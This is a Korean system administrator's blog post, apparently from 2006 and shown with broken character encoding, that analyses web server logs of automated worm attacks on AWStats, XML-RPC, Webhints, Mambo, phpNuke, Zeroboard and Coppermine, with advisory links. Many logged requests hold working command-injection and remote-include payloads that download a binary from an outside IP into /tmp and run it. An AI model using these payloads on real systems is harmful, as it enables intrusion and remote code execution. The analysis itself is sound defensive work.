Ä¿ÇǴнº, ½Ã½ºÅÛ ¿£Áö´Ï¾îÀÇ ½°ÅÍ Ä¿ÇÇÇâÀÌ ³ª´Â *NIX
Ä¿ÇǴнº
½Ã½ºÅÛ/³×Æ®¿÷/º¸¾ÈÀ» ´Ù·ç´Â °÷
* HanIRCÀÇ #coffeenix ¹æ
[ Àåºñ ¹× ȸ¼± ÈÄ¿ø ]
HOME > ³×Æ®¿öÅ©(network) > À¥ ¼­¹ö(web, httpd, apache) µµ¿ò¸»
°Ë»ö : »çÀÌÆ® WHOIS À¥¼­¹ö Á¾·ù

WebDAV (7, ±Û 1, ÀÚ·á 4)
À¥¼­¹ö Æ©´× (5, ±Û 4, ÀÚ·á 2)
À¥¼­¹ö »ç¿ë Åë°è ÀÚ·á (2, ÀÚ·á 1)
Apache SSL / mod_ssl (4, ±Û 3, ÀÚ·á 2)

  À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±× ºÐ¼® (3.22 Ãß°¡) ÀÛ¼ºÀÏ : 2006/03/15 23:43
 
  • ±Û¾´ÀÌ : ÁÁÀºÁøÈ£ ( http://coffeenix.net/ )
  • Á¶È¸¼ö : 95340
          [ ÀÌÀüÈ­¸é / ¼öÁ¤ ]   ºñ¹Ð¹øÈ£ :     Àμâ¿ë È­¸é
      Á¦  ¸ñ : À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±× ºÐ¼®
    ÀÛ¼ºÀÚ : ÁÁÀºÁøÈ£(truefeel, http://coffeenix.net/ )
    ÀÛ¼ºÀÏ : 2006.1.20(±Ý)~
    Á¤¸®ÀÏ : 2006.3.14(È­)
    ¼öÁ¤ÀÏ : 2006.3.22(¼ö)

    2004³â ¸»¿¡¼­ 2005³â ÃÊ¿¡ Zeroboard, Å×Å©³ëÆ®, phpBB µîÀÇ Ãë¾àÁ¡°ú php¼³Á¤ ¹®Á¦·Î À¥»çÀÌÆ® º¯Á¶°¡
    ±ÞÁõÇß´ø ÀÏÀ» ±â¾ïÇÒ °ÍÀÌ´Ù. ÀÌ·¯ÇÑ °ø°ÝÀº ¿úÀ̳ª ÀÚµ¿È­µÈ ÅøÀ» »ç¿ëÇؼ­ ÀÌ·ïÁö´Â°Ô ´ëºÎºÐÀ̸ç,
    ºÐ¼®ÇÑ ·Î±× ¶ÇÇÑ ÀÚµ¿È­µÈ °ø°Ý Åø¿¡ ÀÇÇØ ³²Àº °ÍÀÌ´Ù.
    ºÐ¼®(?)ÇÑ À¥·Î±×´Â À¥·Î±× ºÐ¼®Åø AWStats Åø, ±×¸®°í WordPress, TikiWiki, Drupal, PHPGroupWare,
    Webhints, Zeroboard, CMSÅø Mambo, Æ®·¡ÇÈ ºÐ¼®Åø Cacti µîÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý¿¡ ´ëÇÑ °Í µéÀÌ´Ù.

    ÀÌ À¥·Î±×´Â ÁÖ¿ö ¸ðÀº°Ô ¾Æ´Ñ ¼­¹ö¿¡ ³²Àº ·Î±×¸¦ ºÐ¸®Çؼ­ ¿Ã¸° °ÍÀÌ´Ù. ÀϺΠIP´Â xxx.xxx·Î Ç¥½ÃÇß´Ù.

    ¼­¹ö¸¦ óÀ½ ¿î¿µÇϽô ºÐÀÌ ÀÌ ±ÛÀ» Àаí, 'Çä!! ¿ì¸® ¼­¹öµµ °ø°Ý´çÇß³×, Å«ÀÏÀÌ´Ù.'¶ó°í ´çȲÇÒ±îºÁ
    ¹Ì¸® ¸»¾¸µå¸°´Ù. À§ÀÇ °ø°³ ÇÁ·Î±×·¥À» ¿î¿µÇÏÁö ¾ÊÀ¸¸é °ÆÁ¤ÇÒ ÇÊ¿ä°¡ ¾øÀ¸¸ç, ¿î¿µÇÏ´õ¶óµµ º¸¾ÈÆÐÄ¡°¡
    ÀÌ·ïÁø ÃֽŹöÀü À̶ó¸é ±¦Âú´Ù.(°ø°³¾ÈµÈ Ãë¾àÁ¡µµ ÀÖÁö¸¸). ¶ÇÇÑ ·Î±×¿¡ HTTP/1.? 404 ¶ó°í º¸À̸é
    °ø°Ý ½ÃµµÇÑ °ÍÀÏ»Ó ÇØÅ·´çÇÑ°Ô ¾Æ´Ï´Ï ¾È½ÉÇصµ ÁÁ´Ù.

    ¡Ø ÀÌ ±Û ¸¸Å­Àº MSIE¿¡¼­ Å×À̺íÀÌ °¡Àå Àß Ç¥½ÃµË´Ï´Ù.

    1. À¥·Î±× ºÐ¼®Åø AWStatsÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    203.194.xxx.xx - - [17/Jan/2006:02:09:04 +0900] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:05 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:06 +0900] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillop;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : È«Äá (HK,  203.194.128.0 - 203.194.255.255)

    Âü°í ÀÚ·á :
    * AWStats "configdir" Parameter Arbitrary Command Execution
      http://secunia.com/advisories/13893
    * AWStats Remote Command Execution Vulnerability
      http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185

    2. PHP¿ë XML-RPCÀÇ Remote Code Injection Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    203.194.xxx.xx - - [17/Jan/2006:02:09:09 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:10 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:11 +0900] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:12 +0900] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:13 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:14 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:15 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:17 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 0
    203.194.xxx.xx - - [17/Jan/2006:02:09:18 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 0
     


    - IP : È«Äá (HK, 203.194.128.0 - 203.194.255.255)
    - PHP¿ë XML-RPC 1.1 ÀÌÀü¿¡ ÀÖ´Â Ãë¾àÁ¡À¸·Î
      WordPress, TikiWiki, Drupal, PHPGroupWare µîÀÇ ÇÁ·Î±×·¥µéµµ °ü·Ã Ãë¾àÁ¡ÀÌ ÀÖ´Ù.
    - Linux/Lupper ¿úÀº XML-RPC Ãë¾àÁ¡, AWStats Ãë¾àÁ¡, Darryl Burgdorf Webhints Ãë¾àÁ¡À» ÀÌ¿ëÇÑ ¿úÀÌ´Ù.
      Lupii ¿úÀ¸·Îµµ ºÒ¸°´Ù.
    - ÀÌ ¿ú(º¯Á¾ Æ÷ÇÔ)Àº À§¿Í °°ÀÌ ÀÚµ¿À¸·Î À¥Æ÷Æ®¿¡ ¾ÇÀÇÀûÀÎ ¿äûÀ» Çϸç, ¸¸¾à Ãë¾àÁ¡ÀÌ ÀÖ´Â
      ½ºÅ©¸³Æ®°¡ ¼³Ä¡µÈ ¼­¹ö¶ó¸é ¿ø°ÝÁöÀÇ ÆÄÀÏÀ» ´Ù¿î·Îµå ¹Þ¾Æ ½ÇÇàÇÑ´Ù.

    Âü°í ÀÚ·á :
    * XML-RPC for PHP Nested XML Tags PHP Code Execution
      http://secunia.com/advisories/16431/
    * PEAR XML_RPC Nested XML Tags PHP Code Execution
      http://secunia.com/advisories/16429/
    * Linux/Lupper.worm
      http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html
      http://vil.nai.com/vil/content/v_136821.htm

    3. XML-RPC Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý 2

     
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:39:20 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /x0x0x0x0x0x0x0x0x0/ThisFileMustNotExist HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 0 "-"
    218.232.96.150 - - [20/Feb/2006:02:40:00 +0900] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 0 "-"
     


    - IP : ±¹³»(CATV »ç¿ëÀÚ, 218.232.96.128-218.232.96.255)

    4. Darryl Burgdorf Webhints Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    219.239.xxx.xx - - [20/Dec/2005:04:17:10 +0900] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:11 +0900] "GET /scgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:12 +0900] "GET /includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:14 +0900] "GET /cgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:15 +0900] "GET /scgi-bin/include/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:16 +0900] "GET /cgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:17 +0900] "GET /scgi-bin/inc/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:18 +0900] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:19 +0900] "GET /scgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:20 +0900] "GET /cgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:21 +0900] "GET /scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:22 +0900] "GET /hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:23 +0900] "GET /cgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:25 +0900] "GET /scgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:26 +0900] "GET /cgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:27 +0900] "GET /scgi-bin/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:28 +0900] "GET /hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:29 +0900] "GET /cgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:30 +0900] "GET /scgi-bin/hints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:31 +0900] "GET /webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:32 +0900] "GET /cgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:33 +0900] "GET /scgi-bin/webhints/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:35 +0900] "GET /hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:36 +0900] "GET /cgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:37 +0900] "GET /scgi/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:38 +0900] "GET /cgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:39 +0900] "GET /scgi-bin/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:40 +0900] "GET /hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:41 +0900] "GET /cgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:42 +0900] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:43 +0900] "GET /webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:45 +0900] "GET /cgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
    219.239.xxx.xx - - [20/Dec/2005:04:17:46 +0900] "GET /scgi-bin/webhints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 0
     


    5. CMS ÅøÀÎ Mambo Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    213.203.xxx.xx - - [10/Jan/2006:17:59:50 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:54 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:57 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:17:59:58 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:18:00:00 +0900] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
    213.203.xxx.xx - - [10/Jan/2006:18:00:02 +0900] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 400 299
     


    - IP : ÀÌÅ»¸®¾Æ (IT, 213.203.161.0 - 213.203.161.255)

    6. ZeroboardÀÇ zero_vote Å׸¶ÀÇ Ãë¾àÀúÀ» ÀÌ¿ëÇÑ °ø°Ý

     
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /board/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:33 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:34 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:48 +0900] "GET /zboard/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
    211.42.90.126 - - [02/Dec/2005:09:53:49 +0900] "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http://211.42.90.126/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20211.42.90.126/tagg;perl%20tagg HTTP/1.1" 404 0
     


    - IP : ±¹³»(¼­¿ï°íÀºÃʵîÇб³, 211.42.90.0-211.42.90.127)

    Âü°í ÀÚ·á :
    * Á¦·Îº¸µå º¸¾È Ãë¾àÁ¡ (ÇѱÛ)
      http://bbs.kldp.org/viewtopic.php?p=218132
    * STG Security Advisory: [SSA-20050113-25] ZeroBoard multiple vulnerabilities
      http://www.securityfocus.com/archive/1/387076
    * Zeroboard 'zero_vote' Include File Bug Lets Remote Users Execute Arbitray Commands
      http://securitytracker.com/alerts/2005/Jan/1012812.html
    * Application Attack Analysis (PHP Application Mass Attack) (ÇѱÛ, 2005.1.8)
      http://www.scieng.net/zero/data/pds/1105342062/Application_Attack_Analysis(PHP).pdf

    7. phpNuke Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    216.72.xxx.xxx - - [07/Jan/2006:09:44:59 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 404 0

    200.75.xx.xx - - [06/Jan/2006:10:16:44 +0900] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:46 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:47 +0900] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:49 +0900] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : ¹Ì±¹ (US, 216.72.0.0 - 216.72.255.255)
           ÄÝ·Òºñ¾Æ (CO, 200.75.46.32/27)

    8. phpNuke/postNukeÀÇ Coppermine Æ÷Åä°¶·¯¸® ¸ðµâ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý

     
    200.75.xx.xx - - [06/Jan/2006:10:16:50 +0900] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
    200.75.xx.xx - - [06/Jan/2006:10:16:52 +0900] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|  HTTP/1.1" 404 0
     


    - IP : ÄÝ·Òºñ¾Æ (CO, 200.75.46.32/27)
    - THEME_DIR ÆĶó¹ÌÅÍÀÇ Ã¼Å©¸¦ ÇÏÁö ¾Ê¾Æ ³»¿ÜºÎ ÆÄÀÏÀÇ script code¸¦ includeÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ÀÌ ÀÖ´Ù.

    Âü°í ÀÚ·á :
    * phpNuke/postNuke Coppermine Photo Gallery Module Multiple Vulnerabilities
      http://secunia.com/advisories/11524/

    9. Open WebMail Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý (Ãë¾àÁ¡ÀÌ ÀÖ´Â ¹öÀüÀÎÁö ÆľÇÇϱâ À§ÇÑ ¿äûÀ¸·Î ÆǴܵÊ)

     
